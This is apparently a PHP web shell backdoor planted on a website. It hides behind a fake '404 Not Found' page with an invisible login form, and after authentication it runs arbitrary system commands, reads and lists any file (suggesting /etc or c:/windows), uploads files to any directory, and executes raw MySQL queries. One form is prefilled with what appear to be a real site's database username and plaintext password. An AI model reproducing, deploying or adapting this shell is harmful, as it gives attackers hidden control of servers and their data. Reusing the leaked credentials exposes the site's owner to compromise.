<?php$username = "hacker";$password = "d3090ebbe9bb841fe7d262450f865bc5";$

1. <?php
2. $username = "hacker";
3. $password = "d3090ebbe9bb841fe7d262450f865bc5";
4. $nonsense = "fjfhsljfshiofshioufhiufifuuhifsdfhdsdjkdfdskjksdfhskillojrjkseloefklk";
5.  
6. if (isset($_COOKIE['PrivatePageLogin'])) {
7. if ($_COOKIE['PrivatePageLogin'] == md5($password.$nonsense)) {
8. ?>
9.  
10. <?php
11. ob_implicit_flush();
12. if(isset($_REQUEST['f'])){
13. $filename=$_REQUEST['f'];
14. $file=fopen("$filename","rb");
15. fpassthru($file);
16. die;
17. }
18. if(isset($_REQUEST['d'])){
19. $d=$_REQUEST['d'];
20. echo "<pre>";
21. if ($handle = opendir("$d")) {
22. echo "<h2>listing of $d</h2>";
23. while ($dir = readdir($handle)){
24. if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
25. else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
26. echo "$dir\n";
27. echo "</font></a>";
28. }
29.  
30. } else echo "opendir() failed";
31. closedir($handle);
32. die ("<hr>");
33. }
34. if(isset($_REQUEST['c'])){
35. echo "<pre>";
36. system($_REQUEST['c']);
37. die;
38. }
39. if(isset($_REQUEST['upload'])){
40. if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
41. else $dir=$_REQUEST['dir'];
42. $fname=$HTTP_POST_FILES['file_name']['name'];
43. if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
44. die('file uploading error.');
45. }
46. if(isset($_REQUEST['mquery'])){
47.  
48. $host=$_REQUEST['host'];
49. $usr=$_REQUEST['usr'];
50. $passwd=$_REQUEST['passwd'];
51. $db=$_REQUEST['db'];
52. $mquery=$_REQUEST['mquery'];
53. mysql_connect("$host", "$usr", "$passwd") or
54. die("Could not connect: " . mysql_error());
55. mysql_select_db("$db");
56. $result = mysql_query("$mquery");
57. if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
58. while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
59. mysql_free_result($result);
60. die;
61. }
62. ?>
63. <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
64. <form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
65. upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
66. <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
67. <br>for example:
68. http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
69. or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
70. <hr>execute mysql query:
71. <form action="<? echo $PHP_SELF; ?>" METHOD=GET >
72. host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value="ogswpffg_admin"> password: <input type="password" name="passwd" value="Fergie97">
73.  
74. database: <input type="text" name="db" value="ogswpffg_themes"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
75. </form>
76. ?>
77.  
78. <?php
79. exit;
80. } else {
81. setcookie("PrivatePageLogin", "", time()-3600);
82. echo "Bad Cookie has been removed.";
83. exit;
84. }
85. }
86.  
87. if (isset($_GET['p']) && $_GET['p'] == "login") {
88. if ($_POST['user'] != $username) {
89. echo "Sorry, that username does not match.";
90. exit;
91. } else if (md5($_POST['keypass']) != $password) {
92. echo "Sorry, that password does not match.";
93. exit;
94. } else if ($_POST['user'] == $username && md5($_POST['keypass']) == $password) {
95. setcookie('PrivatePageLogin', md5(md5($_POST['keypass']).$nonsense));
96. header("Location: $_SERVER[PHP_SELF]");
97. } else {
98. echo "Sorry, you could not be logged in at this time.";
99. }
100. }
101. ?>
102. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
103. <html><head>
104. <title>404 Not Found</title>
105. </head><body>
106. <h1>Not Found</h1>
107. <p>The requested URL <?php echo $_SERVER['PHP_SELF']; ?> was not found on this server.</p>
108. <p>Additionally, a 404 Not Found
109. error was encountered while trying to use an ErrorDocument to handle the request.</p>
110. <form action="<?php echo $_SERVER['PHP_SELF']; ?>?p=login" method="post">
111. <br><br><br><br><br><br>
112. <input type="text" name="user" id="user" />
113. <input type="password" name="keypass" id="keypass"/><br />
114. <input type="submit" id="submit" value="Login" style="display:none;"/>
115. </form>
116. </body></html>
117.  
118. <style>
119. input { margin:0;background-color:#fff;border:1px solid #fff; }
120. </style>